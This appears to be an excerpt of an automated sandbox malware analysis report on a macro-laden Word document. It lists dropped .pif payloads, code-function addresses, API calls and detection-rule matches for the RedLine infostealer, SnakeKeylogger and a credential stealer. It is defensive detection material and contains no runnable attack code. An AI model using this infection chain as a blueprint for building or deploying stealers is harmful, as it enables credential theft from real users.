                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIF Code function: 12_2_028CDE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: 7_2_027CF0A8 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EA03010_2_250EA030
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250E004010_2_250E0040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EBC4010_2_250EBC40
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EEE5010_2_250EEE50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EBC5010_2_250EBC50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250E8A5010_2_250E8A50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250E746010_2_250E7460
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250ED87010_2_250ED870
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250E747010_2_250E7470
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EA67010_2_250EA670
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EF49010_2_250EF490
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250E909010_2_250E9090
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EC29010_2_250EC290
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EDEA110_2_250EDEA1
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EDEB010_2_250EDEB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250E7AB010_2_250E7AB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EACB010_2_250EACB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EFAC110_2_250EFAC1
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EB2DF10_2_250EB2DF
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EFAD010_2_250EFAD0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EC8D010_2_250EC8D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250E96D010_2_250E96D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250E04FA10_2_250E04FA
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EE4F010_2_250EE4F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250E80F010_2_250E80F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250EB2F010_2_250EB2F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F612010_2_250F6120
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250FC77010_2_250FC770
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250FDEA810_2_250FDEA8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250FF10810_2_250FF108
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F450010_2_250F4500
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F130010_2_250F1300
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F2F1110_2_250F2F11
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F2F2010_2_250F2F20
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F4B4010_2_250F4B40
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F194010_2_250F1940
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F356010_2_250F3560
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F036010_2_250F0360
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F518010_2_250F5180
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F1F8010_2_250F1F80
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F3BA010_2_250F3BA0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F09A010_2_250F09A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F57C010_2_250F57C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F25C010_2_250F25C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F41E010_2_250F41E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F0FE010_2_250F0FE0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F5E0010_2_250F5E00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F2C0010_2_250F2C00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F482010_2_250F4820
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F162010_2_250F1620
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F324010_2_250F3240
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F004010_2_250F0040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F4E6010_2_250F4E60
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F1C6010_2_250F1C60
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F388010_2_250F3880
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F068010_2_250F0680
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F54A010_2_250F54A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F22A010_2_250F22A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250FFAC910_2_250FFAC9
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F3EC010_2_250F3EC0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F0CC010_2_250F0CC0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250FFAD810_2_250FFAD8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F28E010_2_250F28E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250F5AE010_2_250F5AE0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250FF0F810_2_250FF0F8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2525074010_2_25250740
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2525004010_2_25250040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2525233810_2_25252338
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2525A2B010_2_2525A2B0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2525AE3410_2_2525AE34
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25250E3810_2_25250E38
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25252A3810_2_25252A38
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2525153810_2_25251538
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2525B64010_2_2525B640
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25251C3810_2_25251C38
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25253F2010_2_25253F20
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2525073010_2_25250730
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2525232A10_2_2525232A
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25250E2810_2_25250E28
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25252A2910_2_25252A29
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2525152A10_2_2525152A
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2525B65810_2_2525B658
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_252591E010_2_252591E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_252591D010_2_252591D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25251C2910_2_25251C29
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25B9BDC810_2_25B9BDC8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25B9670810_2_25B96708
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25B9D13810_2_25B9D138
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25B9D12C10_2_25B9D12C
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: 12_2_028B20C412_2_028B20C4
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_00408C6015_2_00408C60
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_0040DC1115_2_0040DC11
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_00407C3F15_2_00407C3F
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_00418CCC15_2_00418CCC
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_00406CA015_2_00406CA0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_004028B015_2_004028B0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_0041A4BE15_2_0041A4BE
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_0041824415_2_00418244
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_0040165015_2_00401650
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_00402F2015_2_00402F20
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_004193C415_2_004193C4
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_0041878815_2_00418788
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_00402F8915_2_00402F89
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_00402B9015_2_00402B90
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_004073A015_2_004073A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1A4012C015_2_1A4012C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1A4012B015_2_1A4012B0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1A40156015_2_1A401560
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEB5FA815_2_1EEB5FA8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEBAF0015_2_1EEBAF00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEB8F1815_2_1EEB8F18
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEBBD6115_2_1EEBBD61
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEBBA7F15_2_1EEBBA7F
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEBAA5815_2_1EEBAA58
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEB582315_2_1EEB5823
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEBB7A015_2_1EEBB7A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEBB4C015_2_1EEBB4C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEBD49015_2_1EEBD490
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEBF0C815_2_1EEBF0C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEB41EB15_2_1EEB41EB
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEBB1DF15_2_1EEBB1DF
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEBAC2015_2_1EEBAC20
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEBD48015_2_1EEBD480
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEBE5E815_2_1EEBE5E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEBE5ED15_2_1EEBE5ED
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEBE5D915_2_1EEBE5D9
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEB33D515_2_1EEB33D5
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_1EEBF0DD15_2_1EEBF0DD
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007780815_2_20077808
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007004015_2_20070040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007350815_2_20073508
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007855015_2_20078550
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007BE3015_2_2007BE30
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_20070E3815_2_20070E38
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007073815_2_20070738
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007000615_2_20070006
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007D83215_2_2007D832
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007D84015_2_2007D840
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007708015_2_20077080
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007DC8815_2_2007DC88
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007DC9815_2_2007DC98
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007E0E015_2_2007E0E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007E0F015_2_2007E0F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_200734F815_2_200734F8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007E53815_2_2007E538
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007854015_2_20078540
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007E54815_2_2007E548
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007B56F15_2_2007B56F
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007B58015_2_2007B580
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007E99015_2_2007E990
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007E9A015_2_2007E9A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007B9C815_2_2007B9C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007B9D815_2_2007B9D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007EDE915_2_2007EDE9
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007EDF815_2_2007EDF8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007BE2015_2_2007BE20
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_20070E2915_2_20070E29
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_20077A2815_2_20077A28
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007F24215_2_2007F242
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007F25015_2_2007F250
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007C27A15_2_2007C27A
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007C28815_2_2007C288
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007F6A815_2_2007F6A8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007C6D015_2_2007C6D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007C6E015_2_2007C6E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007FAF115_2_2007FAF1
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007FB0015_2_2007FB00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007072A15_2_2007072A
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007CB3815_2_2007CB38
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007CF8215_2_2007CF82
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007CF9015_2_2007CF90
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007D3D815_2_2007D3D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007D3E815_2_2007D3E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_20086C1815_2_20086C18
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_20089EB015_2_20089EB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_20087AF015_2_20087AF0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_200865C015_2_200865C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2008DA0015_2_2008DA00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2008DA0515_2_2008DA05
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2008461015_2_20084610
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2008462015_2_20084620
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_20081A4015_2_20081A40
                  Source: ITT # KRPBV2663 .doc OLE, VBA macro line: Sub AutoOpen()
                  Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function AutoOpen Name: AutoOpen
                  Source: ITT # KRPBV2663 .doc OLE indicator, VBA macros: true
                  Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\jphwmyiA.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Code function: String function: 0040D606 appears 48 times
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Code function: String function: 0040E1D8 appears 88 times
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: String function: 027C8798 appears 54 times
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: String function: 027B44D0 appears 33 times
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: String function: 027B480C appears 931 times
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: String function: 027B44AC appears 74 times
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: String function: 027C881C appears 45 times
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: String function: 027B46A4 appears 244 times
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIF Code function: String function: 028B480C appears 619 times
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIF Code function: String function: 028B46A4 appears 154 times
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIF Code function: String function: 028C8798 appears 48 times
                  Source: 10.2.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.1.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 15.2.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
